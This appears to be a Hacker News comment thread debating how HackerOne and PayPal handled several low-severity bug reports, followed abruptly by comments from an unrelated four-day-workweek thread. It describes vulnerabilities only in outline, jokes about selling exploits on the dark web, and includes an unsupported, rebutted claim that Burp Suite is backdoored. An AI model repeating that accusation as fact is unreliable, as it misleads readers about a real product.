sn4pp(10000) 1 day ago [-]

> I would actively, publicly, and immediately disclose bugs that affect anybody who is a client of HackerOne.

Sadly you can't feed your children from media drama.

Maybe in the long run, but you're more likely to get sued.

thaumasiotes(3762) 1 day ago [-]

HackerOne, itself, is pretty generous about reported bugs. (As in, you reported an issue in the website hackerone.com.) They have to be, because their existence depends on everyone thinking bug bounty platforms are a good idea -- it's part of their way of encouraging people to hunt for bug bounties in general.

Payouts for bugs in other products are determined by those companies, not by H1.

thrownaway954(4317) 1 day ago [-]

i think you might want to take a breath, rethink that position and not let your anger cause you to do something stupid. if you disclose a vulnerability, the company HAS EVERY RIGHT to sue you. every security researcher _thinks_ that they are protected by some unwritten good Samaritan law, when in fact, you are hacking and that carries financial and criminal penalties. this is why these bug bounties and established ways of notifying the company of the vulnerabilities exists. you stepping outside of these established channels can be VERY costly. imagine in a moment of unclear thinking and childish behavior, you do something that could cost you your livelihood and financial well-being and also, maybe, get you thrown in jail.

savingGrace(10000) 1 day ago [-]

This is what I was thinking. The only stories I ever see about HackerOne are how horrible they are. As a non-sec dev, I only ever get the feeling that bounty hunting for profitability is the same as trying to sell something on eBay. You're eventually going to get scammed and you have to eat the loss.

soared(4275) 1 day ago [-]

Are hackerone analysts employees of the company? If so the conclusion drawn sounds like complete bs.

If the analysts are just other users, then it definitely sounds like there is a problem.

teslademigod1(10000) 1 day ago [-]

not sure: https://www.hackerone.com/blog/Getting-to-know-the-HackerOne...

'When they aren't triaging reports on our platform, they are spending time on their own bug bounty hunts.'

thaumasiotes(3762) 1 day ago [-]

Bug triagers may be employees of HackerOne, employees of the company (e.g. Paypal here), or contractors indirectly working for the company (I worked in this role for a year). They're not going to be random other researchers.

The screenshots in this article show a 'HackerOne Staff' stamp, so those triagers are employees of H1.

sn4pp(10000) 1 day ago [-]

> They deemed this issue a Duplicate, and we lost another 5 points.

A dupe costs points?! On bugcrowd you GET points for dupes...

thaumasiotes(3762) 1 day ago [-]

The points associated with a duplicate report depend on the status of the report you get duped to. I assume in this case the original report was Not Applicable.

chatmasta(972) 1 day ago [-]

Seems like a dumb policy unless you can see all previous reports.

rideontime(10000) 1 day ago [-]

From PayPal's response to a 2FA bypass:

> If the attacker has the victim's password, they would already be able to gain access to the account via web UI too. As such, the account is already compromised. As such, there does not appear to be any security implications as a direct result of this behavior.

Seriously? This means PayPal's 2FA is just security theater. I'd rather they didn't offer it at all in this case, at least then I'd know how insecure my account really was.

mtgx(168) 1 day ago [-]

I think if you Google Paypal 2FA security issue, you'll find multiple such bugs found over the years. They've never fixed it.

nebulous1(10000) 1 day ago [-]

From reading a different article, the terminology seems to be a bone of contention here. This '2FA' is an email message PayPal send when they detect a new login location. They do not call it 2FA and they do offer actual 2FA that cybernews have not bypassed.

rasengan(1383) 1 day ago [-]

PCI DSS requirements specify that companies have 30 days to refute or remediate externally reported issues [1]. If they don't respond to or fix some of these issues, then PayPal will no longer be compliant, and all credit card companies will be forced to stop working with them unless they wish to set a precedent that PCI-DSS compliance no longer needs to be followed.

According to this image [2], they did not respond or refute within 30 days.

If PayPal's PCI-DSS compliance certification isn't revoked then PCI-DSS is a farce.

[1] https://www.itgovernance.co.uk/blog/a-guide-to-the-pci-dsss-...

[2] https://cybernews.com/wp-content/uploads/2020/02/paypal-2fa-...

87zuhjkas(10000) 1 day ago [-]

There is no doubt that the PCI-DSS is a farce.

tptacek(84) 1 day ago [-]

How is this the top comment on the thread? Do people really believe that failing to respond to a self-XSS report on HackerOne to the satisfaction of the reporter would cause someone to lose their PCI certification?

whatsmyusername(10000) 1 day ago [-]

PCI-DSS does not have Bug Bounty requirements. That's referring to ASV scans which have to be run quarterly by a specific list of vendors and then there's a dispute/remediation process.

Their response is dogshit but not for this reason.

admax88q(10000) 1 day ago [-]

> then PCI-DSS is a farce.

Take a wild guess on what you think will happen.

ohithereyou(10000) 1 day ago [-]

Are there other cases where PCI-DSS compliance requirements are selectively enforced?

rsync(3728) about 23 hours ago [-]

'If PayPal's PCI-DSS compliance certification isn't revoked then PCI-DSS is a farce.'

PCI Compliance is total bullshit and everybody knows it.[1]

[1] https://www.rsync.net/resources/regulatory/pci.html

tsukurimashou(10000) 1 day ago [-]

no shit PCI-DSS is a farce

it's just there to make people that don't know anything about technology feel better

ailideex(4205) 1 day ago [-]

> PCI DSS requirements specify that companies have 30 days to refute or remediate externally reported issues [1]. If they don't respond to or fix some of these issues, then PayPal will no longer be compliant, and all credit card companies will be forced to stop working with them unless they wish to set a precedent that PCI-DSS compliance no longer needs to be followed.

Quote from your source:

> If your scan fails, you must schedule a rescan within 30 days to prove that the critical, high-risk or medium-risk vulnerabilities have been patched.

Scan in this sentence refers to 'a PCI DSS external scan'.

The list of approved vendors that can conduct PCI DSS external scans can be found here: https://www.pcisecuritystandards.org/assessors_and_solutions...

Please find cybernews' certificate number there and quote it for us, I have looked and can't find it.

I would guess that, contrary to your implication, they are not an approved scanning vendor. If this is the case then it really does not speak to the characteristics of PCI-DSS and your comment just seems wrong.

And even if they were an approved scanning vendor, from what little I know about PCI-DSS, these scans are part of larger process - so even if they were an approved scanning vendor the scan failure would still have had to be part of the larger process for this 30 day limit to apply.

I could go on and on about how much I hate PayPal and random other things, but just because I don't like something does not quite justify making false claims about it.

znpy(1679) 1 day ago [-]

My suspicion is that Paypal is now 'too big to fail' and will suffer very little consequences if none at all.

tptacek(84) about 24 hours ago [-]

People have a weird mental model of how big-company bug bounty programs work. Paypal --- a big company for sure, with a large and talented application security team --- is not interested in stiffing researchers out of bounties. They have literally no incentive to do so. In fact: the people tasked with running the bounty probably have the opposite incentive: the program looks better when it is paying out bounties for strong findings.

Here are the vulnerabilities in their report:

1. They can suppress a new-computer login challenge (they call this '2FA', but this is a risk-based login or anti-ATO feature, not 2FA).

2. They can register accounts for one phone, then change it to another phone, to 'bypass' phone number confirmation.

3. There are risk-based controls in Paypal that prevent transactions when anomalies are detected, and some of them can apparently be defeated with brute force.

4. They can change names on accounts they control.

5. They found what appears to be self-XSS in a support chat system.

6. They found what appears to be self-XSS in the security questions challenge inputs.

None of these are sev:hi vulnerabilities, let alone 'critical'. 2 of them --- #4 and #6 --- are duplicates of other people's issues. Self-XSS vulnerabilities are often excluded entirely from bounty programs.

For the last 3 hours, the top comment on this thread has been an analysis saying that, because Paypal is PCI-encumbered, and HackerOne reports can function as 'assessments' for PCI attestations, Paypal is in danger of losing its PCI status (and the fact that it won't is evidence that they are 'too big to fail'). To put it gently: that is not how any of this stuff works. In reality, formal bug bounty programs are a firehose of reports suggesting that DKIM configuration quirks are critical vulnerabilities, and nobody in the world would expect any kind of regulatory outcome simply from the way a bounty report does or doesn't get handled. It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.

The login challenge bypass finding was actually interesting (it would be more interesting if they fully disclosed what it was and what Paypal's response was). But these reporters have crudded up their story with standard bug-bounty-reporter hype, and made it very difficult to judge what they found. I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).

blazespin(3912) about 23 hours ago [-]

(remove message)

Sorry, on further thought while I still disagree with the analysis above as being overly dismissive, I think the OP may share some blame for not writing higher quality reports with POCs. Also, the OP doesn't explain whether or not they saw the original reports for those marked Duplicate. That's a very critical point. See here -

https://docs.hackerone.com/programs/duplicate-reports.html

For anyone actually interested here and not just drive by commenting (like me, ahem), it's worthwhile looking into the platform in more detail. See my post below -

https://news.ycombinator.com/item?id=22406372

mtnGoat(10000) about 23 hours ago [-]

out of curiosity, do you work at PayPal or is the first paragraph all assumptions?

One would have thought Wells Fargo had a talented team of people to catch their millions of fake accounts they made, but alas it went on for a decade. I will always assume companies have their backs turned to security, until proven otherwise, regardless of size or perceived risk.

HiJon89(4256) about 23 hours ago [-]

For #5 I believe it's not just a self-XSS, but also executes on the support agents browser, allowing you to potentially exfiltrate their cookies:

> Anyone can write malicious code into the chatbox and PayPal's system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.

whydoyoucare(10000) about 22 hours ago [-]

I agree -- the tone of the article was cloak-and-dagger, which makes me think things are not what they seem. Unless we fully understand the exact set of issues, it is difficult to decide either way.

Sadly, this also undermines trust in the overall state of 'security research', which most of the time, borders on being silly. :-/

brianpgordon(4163) about 17 hours ago [-]

> It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.

Really? Most companies? That seems like an extraordinary claim.

I'm not a security researcher but if I stumbled on some security issue in something that's not open-source and not owned by my employer, the only way I'd consider reporting it is if they have a bug bounty / responsible disclosure program. Otherwise I'd expect it would be about as likely for me to receive a 'thank you' as a knock on the door from law enforcement.

blazespin(3912) about 22 hours ago [-]

What proof do you have that #6 is not persistent XSS? If it is, that's a potentially brutal vuln (as persistent XSS often is), even if you need the users password to exploit it.

And persistent XSS is definitely not out of scope according to PayPal's guidelines. https://hackerone.com/paypal

Why are you saying #6 is a duplicate of other people's issues? It must have been marked as a dupe of an N/A. They would have gained rep if it was a dupe of someone else's report. They lost rep, so it was most likely marked as a dupe of an N/A.

As I mention below, the big problem is that the OP didn't include POCs. It's easy to claim 'oh, this can be exploited so easily', but without a POC it's not always clear, and perhaps he missed some detail that made his assumptions incorrect.

Anyways, I do have to say HackerOne looks pretty cool. This is the first I've seen of it, and they seem like they are working very hard (we all should be working hard) to make this work for everyone. They are likely just victims of their own success.

rasengan(1383) about 24 hours ago [-]

> 1. They can suppress a new-computer login challenge (they call this '2FA', but this is a risk-based login or anti-ATO feature, not 2FA).

2FA means 2 Factor Authentication. This works by forcing one to use two different forms of identification to authenticate, such as login/password and, in this case, identification of the computer used.

So, with all respect sir, what I'm saying is while this isn't the best 2FA, it absolutely IS 2FA by definition.

nebulous1(10000) about 22 hours ago [-]

> I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).

I agree that they have some issues with the way they've reported it, and I agree with your numbered points, except that the reports imply #5 may make the support agent vulnerable. But I'm not sure you can say PayPal haven't acted abusively. Many of the reports are legitimate vulnerabilities even if they aren't critical ones. The first is clearly a security issue, yet PayPal have said that it isn't. In return they have received nothing but a reputation hit, and this is clearly unfair.

Do PayPal specifically say that anything involving stolen details are out of scope? This seems a bit weak considering they have numerous systems in place to combat misuse of stolen accounts. And even if they do it doesn't explain #2.

edit: To answer my own question, the PayPal page on HackerOne lists 'Vulnerabilities involving stolen credentials or physical access to a device' as out of scope for web applications. They likely intend that to apply to mobile applications also, but they've structured the page in a way that makes that ambiguous.

leejo(3861) 1 day ago [-]

This doesn't surprise me. I'm currently trying to get a refund out of PayPal after what looks like a massive flaw in their refund process. I paid for something on eBay and it appears to have been a compromised account. The original auction, feedback history, etc, looked legit. The flow was this:

1) I pay for a product on eBay using PayPal, with my credit card (paid directly from the card, not from any existing PayPal balance).

2) Seller marks item as shipped but then 5mins later issues an e-check refund (rather than a refund on my creditcard).

3) Seller cancels and deletes the original item on eBay so i can no longer raise a dispute there.

4) The e-check refund continues to bounce as clearly the compromised paypal account can't pull those funds from the other source.

5) The refund being in limbo means my dispute with PayPal gets closed as 'a refund was previously issued' (which did, and will continue to, bounce).

The important part is step 2 – since I paid with my card, the refund should have gone directly to my card. Because I paid by credit card, I've raised a chargeback with the issuing bank, which should hopefully make PayPal sit up and put a bit more effort into sorting this out.

lonelappde(10000) 1 day ago [-]

You put in way too much effort. Call your credit card company first. Your credit card company profits from vendor (PayPal) mistakes by charging fees, so they are always happy to help you.

fencepost(4320) 1 day ago [-]

> I've raised a chargeback with the issuing bank, which should hopefully make PayPal sit up and put a bit more effort into sorting this out.

Or just close your account and ban you.

thedanbob(10000) 1 day ago [-]

I've been bitten before by the fact that if you don't use PayPal, eBay's interest in helping you with a refund dispute is exactly zero. And now I learn this. I guess PayPal + credit card is the way to go if you want any chance of a successful refund.

hoppla(10000) 1 day ago [-]

My last two reports were closed as duplicates. I got some rep for one, and zero rep for the other. Both were real vulnerabilities. It is strange that the reputation reward is not consistent.

lgeorget(4280) about 23 hours ago [-]

According to HackerOne help page on reputation, it depends on the status of the vulnerability: yet undisclosed, not applicable, publicly known...

dev_hacker(10000) 1 day ago [-]

Moral of story is obvious: Next time sell the exploits on the dark web and skip the blog post.

m-p-3(10000) 1 day ago [-]

It's all that PayPal deserves if they get a pass for PCI-DSS non-compliance.

tfandango(10000) 1 day ago [-]

I have not used PayPal since I had to file a dispute over an item I bought on eBay via PayPal. In response, they snail-mailed me screenshots of an internal web app with a bunch of info for someone else: SSN, CC number, address, etc. Everything I would need to do something bad. I called them and they did not seem to care, so I called the guy (I had his number, of course), but he never answered or responded to my email.

A few months later I got a voicemail from paypal, apparently my original call bubbled up. They asked if I had destroyed the info and to let them know if I had not (I did). Then there was a long pause (I guess they assumed the voicemail was over), and it turned out there were 4-5 people on that call and they then discussed how the call went and whether or not it was sufficient to CYA.

I've not used it since, and I hoped they got their act together (sounds like maybe not).

Cynddl(3873) 1 day ago [-]

What does CYA mean? Haven't seen this acronym before.

jedberg(2119) about 22 hours ago [-]

> Then there was a long pause (I guess they assumed the voicemail was over), and it turned out there were 4-5 people on that call and they then discussed how the call went and whether or not it was sufficient to CYA.

That's hilarious. Please tell me you kept that recording.

fxleach(10000) 1 day ago [-]

My experience with PayPal, from dev support to account managers, has been an absolute shit show. They were simply the first to their market and it's hard to kick them out.

strictnein(10000) 1 day ago [-]

I've had plenty of problems with bug bounty platforms and have completely stopped doing them. But most/all of these 'critical' reports aren't critical and some of the behavior of their 'researchers' is unprofessional at best. There's maybe one legit report here, and that's #2.

#1 'In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy.'

So you need to be MITM'd and have a malicious cert installed? Yeah... not 'critical' and out-of-scope for most places.

For '#2 Phone verification without OTP', look at the messages they were sending. Did they not understand H1's responses? Repeatedly demanding answers isn't a great look. It's not surprising it was locked.

For #3: it requires stolen creds. A 'security' flaw that requires stolen creds and brute forcing isn't going to get much traction anywhere.

#4 was a dupe

#5 is a self XSS, no one accepts these

#6 is a stored self XSS and a dupe

Dylan16807(10000) 1 day ago [-]

> So you need to be MITM'd and have a malicious cert installed?

No. The attacker is the man in the middle to himself, because why are you trusting the client.

> A 'security' flaw that requires stolen creds and brute forcing isn't going to get much traction anywhere.

The feature is meant to stop people from using stolen creds.

It does not work.

Given that stolen creds exist, that sounds like a security flaw to me.

celerrimus(10000) about 24 hours ago [-]

Although I have rejected many similar MITM reports myself, in this case I think this is a valid threat. It's not some random comments or forum site where there's almost no value for attackers; we're talking about a pseudo-banking system, where users usually have a few credit cards hooked up and/or some account balance, and indeed there are many places you can buy leaked/stolen credentials. The ability of hackers to bypass automatic 2FA is alarming for a service where users may lose $1,000+. This simply should be fixed, and some bounty should be paid for it (probably not the maximum bounty, but still).

#5 and #6 are indeed exaggerated, especially since even if a hacker has stolen credentials and has bypassed the automatic 2FA, the security question won't be displayed on the same page users use to confirm a payment, so it can't be used to replace the destination e-mail address or keylog credit card information.

ramimac(10000) 1 day ago [-]

I agree that none of these reports could be considered 'critical.' I also agree that the tone is a bit unprofessional. I'd add that I generally find these publicity pushes using fairly bland findings to be distasteful. All that being said, I'd like to clarify a bit based on my read of #1.

> #1 'In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy.'

> So you need to be MITM'd and have a malicious cert installed? Yeah... not 'critical' and out-of-scope for most places.

In general, using a proxy to perform a 2FA bypass wouldn't decrease the risk. In this case, the attacker already has compromised credentials and is trying to bypass the secondary control. As they are the one authenticating, the need for MITM isn't a huge deal.

That being said, another point that was made is that the '2FA' they are bypassing isn't actually PayPal's 2FA. Instead, it is a secondary, risk-based validation. A bit of a semantic difference, but it's important to note that if a user was actually using 2FA, this bypass wouldn't get an attacker with compromised credentials access.

WUHANCLAN(10000) about 24 hours ago [-]

HackerOne is complete garbage. I spent close to a month digging into Uber and compromised their m.uber.com mobile endpoint; they hemmed and hawed and then awarded the $25K to another HackerOne top performer stating that he had discovered the exact same vulnerability the day before I had submitted the report.

What's weird about it is that I was using Burp Proxy for everything, and this guy was directly connected to PortSwigger (and Uber was running some promotional for a free three month license for Burp Proxy).

HackerOne completely sided with Uber on everything, gave the Portswigger kid $25K and that was that.

So, in summary: HackerOne is trash, and Burp Proxy may contain backdoor functionality which is relayed directly back to Portswigger whenever a high value critical vulnerability is discovered with it.

albinowax_(4151) about 21 hours ago [-]

Hi, I work at PortSwigger.

> Uber was running some promotional for a free three month license for Burp Proxy

This is flat out wrong - the promotional partnership was done with HackerOne.

> What's weird about it is that I was using Burp Proxy for everything...

Burp Suite is used by tens of thousands of security experts and if we posted vulnerability data back we would get caught in about ten seconds. Also it would be stupid and illegal etc

Could you share the username of this 'Portswigger kid'? As far as I know I'm the only person here that does bug bounty hunting, and I've never received a 25k payout off Uber. So I'm wondering if this person is actually affiliated with PortSwigger at all.

thaumasiotes(3762) about 22 hours ago [-]

What would you expect HackerOne to do in the situation you describe? You filed a duplicate report. All of the malfeasance you allege is coming from Portswigger.

guidovranken(3782) 1 day ago [-]

HackerOne appears to be completely broken and I wouldn't recommend it to anyone.

Disagreements are to be expected on a bug bounty platform, but these days they just stop responding altogether and don't pay. It borders on outright fraud.

I've been trying to report a Squid RCE (CVE-2020-8450) since October. The Squid maintainers seemed unprepared for dealing with the report as they kept being unresponsive and it took 2 months to merge my patch. Maybe they're volunteers, so I can't blame them. Reported it to the bug bounty [1] which promises high rewards on January 20th and apart from triaging it, there has been radio silence since despite having invoked HackerOne mediation. I have more Squid memory bugs and I'd rather rm -rf them than go through this process again.

HackerOne used to be decent but this appears to be a structural problem now [2].

[1] https://hackerone.com/ibb-squid-cache [2] https://twitter.com/DevinStokes/status/1228014268567547905

DyslexicAtheist(90) 1 day ago [-]

I've never liked these rent-seeking bugbounty platforms which are inserting themselves as middle-men and mediators, but then take away the real value that comes from building direct client relationships.

it's ok for people who start out and only want to work on vulns and not bother with 'sales' (building long term client relationships). severely limiting though in the long run!

much better to spend time on pitching your service directly and build a name for yourself this way. most customers I had always came back and rewarded me with more work. on those bounty platforms however you're constantly competing with drive-by pen-testers who lower your price, and you have no say in the whole negotiation and bargaining phase. your previous reputation also tends to stay locked into these platforms.

a better long term approach is to build connections, set up a ltd (LLC) and make sure you have a good lawyer who can advise you (not just when things go down). ideally build a collective with other like minded (e.g. like a consulting or law practice where you don't always have to share clients but you can if you want to complement each others skills).

this is imo the best way to escape the 'scope-prison' and the best way to learn about clients additional (and actual) weak points (points that they haven't themselves even thought about).

does anyone here do it this way or with a similar approach?

csnover(4304) 1 day ago [-]

HackerOne's community team also seems trained to gaslight ethical reporters who try to follow responsible disclosure practices.

I submitted a vulnerability to a vendor on H1 along with a typical "I plan on publicly disclosing this vulnerability on X date" note, and started getting emails directly from H1 telling me that this undermined vendors' confidence in the platform and that doing what I was doing might make it so I can't use HackerOne any more. In the same correspondence they said that my approach made sense—but they continued to threaten that "it would be a shame if you weren't able to participate any more".

In my case, the vendor verified the vulnerability quickly, but kept dodging my follow-ups by replying without answering my questions. When the vendor refused to assign a CVE after I asked four times, I contacted the HackerOne CNA directly to get an assignment. They replied within 48 hours asking if there was any public information already, I said no and that I was planning on disclosing on X date, and then they just stopped replying for a month until after the deadline passed.

At a glance, H1's disclosure guideline appears fairly reasonable: 30 days by default, an upper bound of 180 days. In actuality, those times only start once a vendor closes a ticket, and can be extended indefinitely. Reporters aren't allowed to speak publicly about anything they send to the platform until the ticket is closed and the vendor agrees to allow it, even in the public programs.

As far as I can tell, HackerOne's primary purpose now is to act as a shield for bad vendors to hide their security defects from the public by using network effects to bully reporters into keeping quiet. The community team claim this isn't what they're doing and that they always ask "why should this be private?", but their marketing material to vendors tells a different story[0], their actions with me tell a different story, and the vendor I reported to had over 100 closed reports, going back years, and none of them were publicly disclosed.

Unless you must pay your bills with security bounties, or don't actually care and just want to dump a report and forget about it, I unequivocally recommend against using HackerOne to report a vulnerability.

[0] https://www.hackerone.com/sites/default/files/2018-11/The%20... page 12: "even with a public program, bug reports can remain private and redacted, disclosure timeframes are up to you"

RyJones(4254) about 22 hours ago [-]

My experience with Hacker One is almost entirely negative and I don't understand why it has such mindshare.

WUHANCLAN(10000) about 15 hours ago [-]

HackerOne is complete fraud. They've got a super duper simple carrot before the horse business model which has thousands of kids beating up web apps for free. A valuable service for their Fortune 100 clientele; for the people actually doing the work for them, not so much.

mehlmao(10000) 1 day ago [-]

I worked as a contractor for a company that's a household name in the US. I am now convinced that HackerOne only exists for CISOs to say 'look, I'm doing something' during the 2-3 years they stay at a company.

The cybersecurity team had a backlog of roughly 30 critical issues discovered internally before starting HackerOne. We were unable to fix those issues, or the ones reported to us, because we had no visibility into source code, there were 12 different development teams, most of them outsourced, and all the project managers were interested in was covering their ass.

The HackerOne deployment was invite-only, but the few hackers in it did fantastic work. I kept being told to find excuses to reduce the amount we'd pay for the critical issues they'd find and we'd fail to fix. At least we triaged faster than Paypal.

tptacek(84) about 24 hours ago [-]

What does 'broken' mean here? If the development team is unresponsive, what do you expect H1's response to be?

cj(2950) 1 day ago [-]

> HackerOne appears to be completely broken and I wouldn't recommend it to anyone.

Completely disagree with this.

I launched a HackerOne program for my company last month (for free, not using their "managed" service).

Of the many reports people submitted, we triaged 30-40 valid reports (most very minor, one or two moderate). We paid out a few thousand dollars in rewards.

At the same time, we also did a more traditional 2-week penetration test with Cobalt (https://cobalt.io/) that cost over $10,000, and HackerOne was the clear winner when it came to the number of high quality security reports worth fixing. And H1 was 2-3x cheaper after paying out the bounties.

I'm sure HackerOne isn't great for all companies, but just posting this to refute the blanket statement that HackerOne is "completely broken" across the board.

luch(4156) 1 day ago [-]

Squid is vastly under-equipped to deal with the security hygiene needed for a project this important.

That's the tragedy of the open source world : mission critical for everyone, but no actor willing to maintain it properly. It's Heartbleed all over again.

LegitShady(10000) 1 day ago [-]

>When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched, although we received no bounty, credit, or even a thanks. Instead, we got our Reputation scores (which start out at 100) negatively impacted, leaving us worse off than if we'd reported nothing at all.

That seems like a good way to make sure nobody trusts your business. What say you, HackerOne? How can anyone trust a business that acts against what is ostensibly its core function?

thaumasiotes(3762) 1 day ago [-]

They had out-of-scope issues closed as being out-of-scope, which automatically lowers their reputation on the platform. The researchers are outraged:

> When we submitted this to HackerOne, they responded that this is an "out-of-scope" issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

But Paypal's policy really couldn't be clearer:

> Out-of-Scope Vulnerabilities

> Vulnerabilities involving stolen credentials or physical access to a device

( https://hackerone.com/paypal )

If Paypal says 'don't send us this type of report', and you send one anyway, are you really surprised when your account gets a warning attached saying 'this person usually files low-value reports'?

harikb(3684) 1 day ago [-]

There is plenty of blame to go around beyond the management. Management is always going to deflect, deny, or do whatever it takes to save face. There must be "architect/lead engineer" level folks whose primary task is to engineer this stuff well. WTF are they doing?

There should be a wall of shame for these (not by person, but by company and group). Next time you get a contact/candidate who "lead the sign-on 2fa management" at PayPal, we will know to be extremely cautious.

There is no "karma" in tech world. People design the shittiest systems in company 1 and then move on to some other role in company 2 and float around taking credit for more and more stuff someone else did.

dinkydrew(10000) 1 day ago [-]

As someone in management, I will somewhat agree that management too often deflects from their ownership and responsibility, but what you are saying is also a form of deflection, unless you also espouse a kind of paternalistic oversight over architects/engineers that would absolve them of responsibility by simply being mindless executors of management's commands and lead. I suspect that is not something most here would support.

There needs to be a balance, each party needs to play their own role and work in unison. As much as managers need to manage things and largely clear the way for architects and engineers, architects and engineers need to perform their job and role, to which I would argue belongs adhering to industry standards for security as a core aspect.

If there was clear pressure on, or even overriding of, architects/engineers insisting on adhering to standards by managers who were not performing their role of advocating for and negotiating on behalf of architects/engineers, and who were instead sabotaging them and their product, then sure, it's a management failure; but at that point, architects and engineers should have outright refused and revolted against the managers, or at the very least clearly and expressly voiced their vehement opposition.

As a manager, I would have even stuck my neck out and sided with an architect and engineer rebellion if they were pressured or even asked to sacrifice core requirements. I also understand though that not all organizations have managers that would do that, especially in careerist organizations where managers see people as bodies to pile up to climb the ladder faster.

hprotagonist(2013) 1 day ago [-]

paypalsucks has been a registered domain since 2002 for a good reason.

aneutron(4316) 1 day ago [-]

That is a hilarious random fact. Thanks for the info.





Historical Discussions: More bosses give four-day workweek a try (February 21, 2020: 921 points)

(927) More bosses give four-day workweek a try

927 points 4 days ago by hhs in 100th position

www.npr.org | comments | anchor





All Comments: [-] | anchor

theatraine(3663) 4 days ago [-]

I never understand these studies. I'm bootstrapping a startup and my work output scales linearly with hours until about 60 hours per week. 60 hours per week is comfortable with 4x12 hour days and then 12 hours over two shorter days. To accomplish errands and the like I just do things before 2pm which is plenty of time.

For me personally more time working = more output. What am I missing?

I should note that I have no family, no commute, and my gym is in my home so I'm able to save some hours on those things. I could see how in those cases one would have less time for work.

quietthrow(2919) 3 days ago [-]

You are part of the hyperactive onsite mainstream HN crowd: single or married, but with no other responsibilities (children, aging parents, and other such commitments). When you live the other life you will see how work just fills up and an extra day feels like a miracle.

kharak(10000) 3 days ago [-]

I wonder what you do. There are plenty of things I could do for 12 hours; coding isn't one of them. Honestly, I'd say that I average about 6 hours a day of coding ability. That's up from about 4 hours before, because I changed a great deal of unhealthy habits.

incompatible(3627) 3 days ago [-]

I'm wondering how many people would take advantage of the 4-day work week to fit in another job in one or more of the off-days. How many people are obsessed with obtaining higher income, far beyond what they need to survive?

combatentropy(4295) 4 days ago [-]

I'm still waiting for someone to do a study of a three-day (24-hour) work week.

tren(4260) 4 days ago [-]

I've been doing this for 3 years now and it works great for me. 3/4 of our company are 4 days or less a week and in the last 5 years we've turned a loss making company into something quite profitable. We generally have one short meeting a week, outside of that we do 1 on 1s when necessary. The rest of the time we can sit down and focus 100%.

BlameKaneda(4308) 4 days ago [-]

Wonder how hourly employees who work 4-day weeks at 32 hours would feel about this proposal.

strig(10000) 4 days ago [-]

They could do 4x 10 hour days instead

izzydata(10000) 4 days ago [-]

If they increase the hourly pay by 20% then probably quite happy.

Edit: 25% (40/32 = 1.25, to keep weekly pay the same).

bboygravity(10000) 3 days ago [-]

These recurring 4-day work week discussions on HN show how non-European this site is.

4-day work weeks have been completely normal for lots of people in Europe for decades. In the Netherlands it's almost the norm to choose whether you want to work 4 or 5 days. 4-day work weeks are not accepted everywhere, but they are in most places.

In France the standard work week has been 35 hours for the past 2 decades, which may or may not equate to a 4 day work week depending on how you organize your work days.

The Netherlands and France are still alive and kicking. They have plenty of successful businesses.

Conclusion: no, 4 day work weeks will not destroy your country, economy, business or lifestyle. The one and only reason to have 5 day or longer work weeks is: greed. IMHO.

Having said that, IMO a more important factor in time savings would be remote working or not. Assuming a commute of an hour each way (2 hours total per day, the reality for lots of people), you waste 10 hours per week of your life commuting. Unpaid.

5 days a week without commute = -10 unpaid hours spent on work related things (vs with commute)

4 days a week with commute = -2 unpaid hours spent on work related things.

hylaride(10000) 3 days ago [-]

The famous French 35 hour workweek only applies to certain categories of workers though. And even then it's only where overtime kicks in. Every French white collar worker I've known (probably about a dozen or so) was on salary and had similar working hours to me (in Canada).

Also, French productivity can be overstated in statistics. They have relatively high unemployment amongst youth and the low-skilled. This essentially removes the least productive from the stats, making it look higher.

Not to say that a 4 day week would be bad, but careful what you base it on.

SnowProblem(4266) 3 days ago [-]

> The Netherlands and France are still alive and kicking. They have plenty of successful businesses.

Are they? I can't think of a single technology company coming out of either.

jt2190(4236) 4 days ago [-]

Counter-point, from the article:

> Natalie Nagele, co-founder and CEO of Wildbit, has heard from other leaders who say it didn't work for them. She says it fails when employees aren't motivated and where managers don't trust employees.

Also it would be good to keep in mind the Hawthorne Effect: https://en.wikipedia.org/wiki/Hawthorne_effect#History

chadlavi(4310) 4 days ago [-]

> it fails when employees aren't motivated and where managers don't trust employees

I'd counter that _anything_ (including the standard 5x8 schedule) will fail in those conditions.

jacquesm(45) 4 days ago [-]

It's interesting to note that in Europe that 32 hour workweek is fairly standard and nobody would even bat an eye or think this is special in any way.

https://smallbiztrends.com/2018/11/working-hours.html

TrackerFF(10000) 4 days ago [-]

Here in Norway it is 37.5 hours of paid work / week.

Our finance minister recently had a hissy fit over the idea of shortening the work week, arguing that if we got rid of 3.5 hours a week (i.e down to 34 hr. weeks) we'd lose out on tens of billions in tax revenue.

fogetti(4048) 4 days ago [-]

Is it though? I worked in 4 different jobs across 2 different countries and this was unheard of. Not even a single one of my friends do this.

nagyf(10000) 4 days ago [-]

Source for this? I'm from Europe and I have friends working in 2-3 different countries in Europe, but 32 hour workweek is not standard anywhere. Never even heard of such a thing being standard in Europe.

lwb(10000) 4 days ago [-]

Something felt fishy about their claim that number of hours worked has been climbing in the United States so I checked their source. It turns out that 'average annual hours worked' has changed from 1,780 in 2011 to 1,786 last year. This seems like barely a rounding error...

On the other hand, if you look at the FRED website it shows that average annual hours worked has massively decreased in the last 50 years: https://fred.stlouisfed.org/series/AVHWPEUSA065NRUG

1951, for example, shows 2,030 hours worked on average. That's the equivalent of more than six additional weeks of full time work.

I would say that Keynes's prediction that economic growth could get to the point where we would only need to work 15 hours a week (750 hours per year, assuming 2 weeks vacation) is ... trending towards becoming true? At current trends, it will take another ~280 years.

(Obviously this is a silly prediction but, an interesting thought experiment.)
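For what it's worth, the ~280-year figure checks out as a straight-line extrapolation of the FRED numbers quoted above (a sketch; it assumes the 1951-to-present decline continues linearly):

    hours_1951, year_1951 = 2030, 1951
    hours_now, year_now = 1786, 2019
    target = 15 * 50                       # 15-hour weeks, 2 weeks vacation

    decline_per_year = (hours_1951 - hours_now) / (year_now - year_1951)  # ~3.6 h/yr
    years_left = (hours_now - target) / decline_per_year
    print(round(years_left))               # ~289 years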

walshemj(4216) 4 days ago [-]

